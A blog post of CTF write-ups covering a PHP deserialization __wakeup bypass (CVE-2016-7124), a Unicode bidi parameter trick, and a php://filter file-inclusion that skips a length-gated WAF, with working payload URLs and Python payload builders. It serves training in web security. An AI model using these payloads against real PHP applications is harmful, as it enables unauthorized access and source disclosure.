Some CTF challenges

Deserialization challenges

[极客大挑战 2019]PHP1

Prerequisites:

__construct: runs automatically when an object is created with new (initialisation); it is NOT called by unserialize()
__wakeup: runs automatically when an object is unserialized
__destruct: runs automatically when the object is destroyed (for example at the end of the script)

First, directory scanning turns up www.zip.

Examine the code in class.php:

<?php
include 'flag.php';

error_reporting(0);

class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    // runs on unserialize(): overwrites whatever username the payload carried
    function __wakeup(){
        $this->username = 'guest';
    }

    // runs when the object is destroyed: loose (!=) compare on password,
    // strict (===) compare on username
    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();
        }
    }
}
?>

From the code review:

__construct only runs when the object is built with new; unserialize() does not call it.
__destruct does the checks when the object is destroyed:
password != 100 must be false, i.e. password == 100 (loose comparison, so the integer 100 or the string "100" both pass)
username === 'admin' (strict comparison)
The catch: unserialize() calls __wakeup automatically, and __wakeup overwrites username with 'guest', so a straightforward payload always fails the username check.

Next, build the serialization script:

<?php

// Same class name and property visibility as class.php; __wakeup and
// __destruct are left out so nothing interferes while serializing
class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }
}

$a = new Name('admin',100);
echo serialize($a);
?>

Result (each private property name is wrapped in NUL bytes, shown here as \0; they are invisible when printed but are counted in the length 14):

O:4:"Name":2:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}

Back to index.php, which passes the select GET parameter to unserialize().

After unserialize() the __wakeup magic method is called, so __wakeup has to be bypassed.

In PHP before 5.6.25 / 7.0.10 (CVE-2016-7124), if the property count declared in the serialized object is larger than the number of properties actually present, __wakeup is skipped. So change the count after the class name from 2 to 3:

O:4:"Name":3:{s:14:"\0Name\0username";s:5:"admin";s:14:"\0Name\0password";i:100;}

Note: private property names are serialized as \0ClassName\0property, i.e. a NUL byte, the class name, and another NUL byte in front of the property name. The NUL bytes are counted in the length (s:14: for \0Name\0username) but they are invisible and get lost when the string is copy-pasted:

O:4:"Name":3:{s:14:"口Name口username";s:5:"admin";s:14:"口Name口password";i:100;}

Each 口 has to be written as %00 so the server URL-decodes it back into a NUL byte:

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}

Final payload:

http://f8610277-461b-4f1b-ae6f-5f5341d0c73d.node4.buuoj.cn:81/?select=O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";i:100;}
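As an added example (my own code, not part of the original writeup), the script below is a small PHP serializer in Python: it produces the \0Name\0property keys for private properties (and \0*\0property for protected ones), can declare a property count larger than the real one for the __wakeup bypass, and percent-encodes the NUL bytes. The class and property names are the challenge's; the function and parameter names are mine. The bypass itself only works on PHP before 5.6.25 / 7.0.10 (CVE-2016-7124); on a patched interpreter the mismatched count makes unserialize() fail instead.

```python
"""Build the PHP1 payload: serialize a PHP object with private properties,
bump the declared property count to skip __wakeup (CVE-2016-7124),
and URL-encode the NUL bytes as %00."""
from urllib.parse import quote


def php_str(s: str) -> str:
    # PHP counts bytes, not characters; NUL bytes count too
    return f's:{len(s.encode())}:"{s}";'


def php_value(v) -> str:
    # bool is checked before int because bool is a subclass of int
    if isinstance(v, bool):
        return f'b:{int(v)};'
    if isinstance(v, int):
        return f'i:{v};'
    if isinstance(v, str):
        return php_str(v)
    raise TypeError(f'unsupported type {type(v).__name__}')


def php_object(class_name: str, props, declared_count=None) -> str:
    """props: iterable of (name, visibility, value).

    Property keys follow PHP's own name mangling:
      public    -> name
      protected -> \0*\0name
      private   -> \0Class\0name
    declared_count lets the count in the header differ from the real
    number of properties (the __wakeup bypass); None means the real count."""
    body = []
    for name, visibility, value in props:
        if visibility == 'private':
            key = f'\0{class_name}\0{name}'
        elif visibility == 'protected':
            key = f'\0*\0{name}'
        else:
            key = name
        body.append(php_str(key) + php_value(value))
    count = len(body) if declared_count is None else declared_count
    return f'O:{len(class_name)}:"{class_name}":{count}:{{{"".join(body)}}}'


def url_payload(serialized: str) -> str:
    # keep the structural characters readable, encode everything else
    # (in particular \0 -> %00, which copy-paste would otherwise drop)
    return quote(serialized, safe=':"{};')


# the challenge's class: both properties private, password compared loosely to 100
PROPS = [('username', 'private', 'admin'), ('password', 'private', 100)]


def honest_payload() -> str:
    """What serialize() in PHP prints, NUL bytes included."""
    return php_object('Name', PROPS)


def wakeup_bypass_payload() -> str:
    """Declared count 3 for 2 real properties, ready for ?select=."""
    return url_payload(php_object('Name', PROPS, declared_count=len(PROPS) + 1))


if __name__ == '__main__':
    print(repr(honest_payload()))
    print('?select=' + wakeup_bypass_payload())
```

The same php_object() works for the public-property case (no mangling, real count) and is what you would reach for whenever a challenge's properties are protected, since the \0*\0 prefix is just as invisible as the private one.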

[SWPUCTF 2021 新生赛]ez_unserialize

<?php

error_reporting(0);
show_source("cl45s.php");

class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="user";
        $this->passwd = "123456";
    }

    // runs when the unserialized object is destroyed at the end of the script;
    // both properties are public, so the payload can set them directly
    public function __destruct(){
        if($this->admin === "admin" && $this->passwd === "ctf"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}

// __construct is not called by unserialize(), so the defaults above never apply
$p = $_GET['p'];
unserialize($p);

?>

The serialization script follows directly (no __wakeup here, so nothing needs bypassing):

<?php
class wllm{

    public $admin;
    public $passwd;

    public function __construct(){
        $this->admin ="admin";
        $this->passwd = "ctf";
    }

}

$a=new wllm();
echo serialize($a);

?>

payload:

http://node4.anna.nssctf.cn:28766/cl45s.php?p=O:4:"wllm":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:3:"ctf";}

[NISACTF 2022]checkin ktrol

This one is not a deserialization challenge, but I'm putting it here for now.

First, look at the challenge prompt.

At first glance I thought it was just a matter of passing the two parameters and done.

It turned out not to be that simple; after checking for a long time I confirmed it was not a typo.

Then the challenge hint pointed the way:

there are Unicode characters in this piece of code that cannot be displayed.

These characters are unprintable, so presumably they were missing from the parameters I had been sending. Pasting the code into VS Code shows them.

Next, construct the parameters. Since these characters are unprintable, they have to be URL-encoded.

After encoding:

ahahahaha%3Djitanglailo%26%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan%3D%E2%80%AE%E2%81%A6%2B%21%21%E2%81%A9%E2%81%A6%26+%E2%80%AE%E2%81%A6+Flag%21%E2%81%A9%E2%81%A6N1SACTF

Only the garbled parts should be URL-encoded; the other symbols (the = and & separators) must stay as they are:

ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

Or pull out all the special characters individually and URL-encode just those.

Final payload:

?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%A9%E2%81%A6N1SACTF

This took me a long time; one wrong character anywhere and it fails.

Finally got the flag.

This Unicode trick is quite interesting; I had not seen it before. When you copy part of the string you also end up with text from the other end of it, which is presumably a characteristic of these hidden characters. Decoding the %E2%80%AE, %E2%81%A6 and %E2%81%A9 sequences gives U+202E (RIGHT-TO-LEFT OVERRIDE), U+2066 (LEFT-TO-RIGHT ISOLATE) and U+2069 (POP DIRECTIONAL ISOLATE): bidi control characters that change the display order of the text without changing its byte order, which is exactly why a visual selection grabs bytes from somewhere else in the string.

I'll read up on it when I have time.
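As an added example (my own code, not part of the original writeup), the script below reveals the bidi control characters hidden in the parameter name and value, and builds the query string with the standard library so that the = and & separators are left alone while every byte of the hidden characters is percent-encoded. The parameter name and value are reconstructed from the percent-encoded payload above (%E2%80%AE = U+202E, %E2%81%A6 = U+2066, %E2%81%A9 = U+2069); the function names are mine. The same Cf-category check catches the characters used in Trojan Source attacks on source code reviews, not just CTF parameter names.

```python
"""Reveal the invisible Unicode bidi controls in the checkin ktrol
parameter names and build a correctly encoded query string for them."""
import unicodedata
from urllib.parse import parse_qs, quote, urlencode

# Reconstructed from the writeup's percent-encoded payload:
# %E2%80%AE = U+202E, %E2%81%A6 = U+2066, %E2%81%A9 = U+2069
PARAM_NAME = '\u202e\u2066Ugeiwo\u2069\u2066cuishiyuan'
PARAM_VALUE = '\u202e\u2066 Flag!\u2069\u2066N1SACTF'
PARAMS = {'ahahahaha': 'jitanglailo', PARAM_NAME: PARAM_VALUE}


def hidden_controls(s: str):
    """List (index, codepoint, name) for every format character in s.
    Unicode category Cf covers the bidi overrides and isolates (and zero-width
    joiners and the like), which is what renders invisibly in an editor."""
    return [(i, f'U+{ord(c):04X}', unicodedata.name(c))
            for i, c in enumerate(s) if unicodedata.category(c) == 'Cf']


def make_visible(s: str) -> str:
    """Replace each Cf character with a printable <U+XXXX> marker so the
    real byte order of the string can be read in a terminal or a diff."""
    return ''.join(f'<U+{ord(c):04X}>' if unicodedata.category(c) == 'Cf' else c
                   for c in s)


def build_query(params: dict) -> str:
    """urlencode with quote (not the default quote_plus): non-ASCII bytes
    become %XX, space becomes %20, and = / & stay as separators."""
    return urlencode(params, quote_via=quote)


def query_roundtrips(query: str, params: dict) -> bool:
    """Check that a server-side parser recovers exactly the intended
    names and values, control characters included."""
    decoded = {k: v[0] for k, v in parse_qs(query).items()}
    return decoded == params


if __name__ == '__main__':
    for idx, cp, name in hidden_controls(PARAM_NAME):
        print(f'{idx:2d} {cp} {name}')
    print(make_visible(PARAM_NAME))
    print('?' + build_query(PARAMS))
```

The resulting query differs from the hand-built one only in that the space and the exclamation mark are percent-encoded as well, which any server decodes identically.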

PHP stream wrappers (php://)

[鹏城杯 2022]简单包含

Prerequisites:
1. PHP stream wrappers: php://filter with a convert.base64-encode filter returns the target file base64-encoded instead of executing it, so PHP source can be read through an include:

php://filter/read=convert.base64-encode/resource=[filename]

For details see https://segmentfault.com/a/1190000018991087

Look at the challenge prompt.

First try including flag.php directly.

There is a WAF. Include index.php to see what the WAF is.

The page comes back blank; my guess is that the output contains the string "flag" and gets filtered. So read index.php through the php://filter wrapper instead, which returns a base64 blob. Decoded, it reads:

<?php

$path = $_POST["flag"];

// The WAF only fires when the raw POST body is under 800 bytes AND the
// requested path contains "flag". && short-circuits, so a body of 800+
// bytes means the preg_match is never evaluated.
if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)) {
    echo 'nssctf waf!';
} else {
    @include($path);
}
?>

The decoded file then continues with static HTML, which is the "source" the challenge page shows (a plain include($_POST["flag"]) plus the hint //flag in /var/www/html/flag.php):

<code><span style="color: #000000">
<span style="color: #0000BB">&lt;?php&nbsp;<br />highlight_file</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">);<br />include(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">"flag"</span><span style="color: #007700">]);<br /></span><span style="color: #FF8000">//flag&nbsp;in&nbsp;/var/www/html/flag.php;</span>
</span>
</code><br />

In the if statement:

if (strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path))

the WAF only triggers when both conditions hold: the raw POST body is shorter than 800 bytes and the path contains "flag". So pad the request body to at least 800 bytes with any throwaway parameter; the first condition is then false, the regex is never evaluated, and the path may contain "flag" freely. Combined with the php://filter wrapper, flag.php comes back base64-encoded instead of being executed.

Final payload (POST body; the a= parameter is nothing but padding to push the body past 800 bytes):

a=aasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdsdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdaasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdas&flag=php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php
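As an added example (my own code, not the challenge's), here is the WAF condition modelled in Python next to a body builder that pads the request to 800 bytes. The filter path is the one from the payload above; the padding key a, the padding length and the function names are my choices.

```python
"""Model the nssctf waf condition from the decoded index.php and build a
POST body that skips it: a padding parameter pushes the raw body past 800
bytes, so the preg_match on 'flag' is never evaluated."""
import re
from urllib.parse import parse_qs, quote

# Wrapper that returns the file base64-encoded instead of executing it
FILTER = 'php://filter/read=convert.base64-encode/resource=/var/www/html/flag.php'

# An unpadded request: under 800 bytes and the path contains "flag"
SHORT_BODY = b'flag=' + quote(FILTER, safe='').encode()


def waf_blocks(raw_body: bytes, path: str) -> bool:
    """Same truth table as
    strlen(file_get_contents('php://input')) < 800 && preg_match('/flag/', $path)
    PHP's && short-circuits: once the body is >= 800 bytes the regex never
    runs, so 'flag' in the path is allowed."""
    return len(raw_body) < 800 and re.search(r'flag', path) is not None


def build_body(path: str = FILTER, min_len: int = 800, pad_key: str = 'a') -> str:
    """x-www-form-urlencoded body <pad_key>=aaaa...&flag=<path>, padded so
    the whole body is at least min_len bytes (all ASCII, so len == bytes)."""
    tail = '&flag=' + quote(path, safe='')
    head = pad_key + '='
    pad = max(1, min_len - len(head) - len(tail))
    return head + 'a' * pad + tail


def included_path(raw_body: bytes) -> str:
    """What $_POST['flag'] holds after PHP parses the body."""
    return parse_qs(raw_body.decode())['flag'][0]


def request_is_blocked(raw_body: bytes) -> bool:
    """Run a whole request body through the modelled check."""
    return waf_blocks(raw_body, included_path(raw_body))


if __name__ == '__main__':
    padded = build_body().encode()
    print('short body blocked :', request_is_blocked(SHORT_BODY))
    print('padded body blocked:', request_is_blocked(padded))
    print(len(padded), 'bytes')
```

The general lesson is the one the model makes explicit: a size check joined to a content check with && is only as strong as the cheaper condition, and the attacker controls the size.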

JS

[HDCTF 2023]Welcome To HDCTF 2023

In view-source:, find game.js.

Or just search for alert.

Code of the form (+[![]]+[])[+[]]+( ... is JSFuck: JavaScript written using only the six characters []()!+. It is an encoding, not encryption, and the browser evaluates it as ordinary JS.

Either call alert(seeeeeeeecret) directly in the console, or decode the JSFuck.

posted @ 2023-11-17 12:02  redfish999